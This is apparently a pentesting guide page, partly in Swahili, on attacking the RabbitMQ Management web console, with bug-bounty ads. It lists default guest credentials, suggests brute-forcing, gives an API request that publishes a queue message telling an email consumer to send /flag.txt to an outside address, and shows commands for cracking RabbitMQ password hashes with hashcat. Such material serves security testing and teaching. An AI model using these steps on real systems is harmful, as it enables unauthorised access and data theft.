15672 - Pentesting RabbitMQ Management

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Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la hali ya juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata zawadi hadi $100,000!

Basic Information

You can learn more about RabbitMQ in 5671,5672 - Pentesting AMQP. In this port you may find the RabbitMQ Management web console if the management plugin is enabled. The main page should looks like this:


The default credentials are "guest":"guest". If they aren't working you may try to brute-force the login.

To manually start this module you need to execute:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Mara tu umepata uthibitisho sahihi utaona konsoli ya admin:

Pia, ikiwa una akreditivu halali unaweza kupata habari ya kuvutia katika http://localhost:15672/api/connections

Kumbuka pia kwamba inawezekana kuchapisha data ndani ya foleni kwa kutumia API ya huduma hii kwa ombi kama:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

Kufungua Hash

echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist


  • port:15672 http

Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la hali ya juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

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Last updated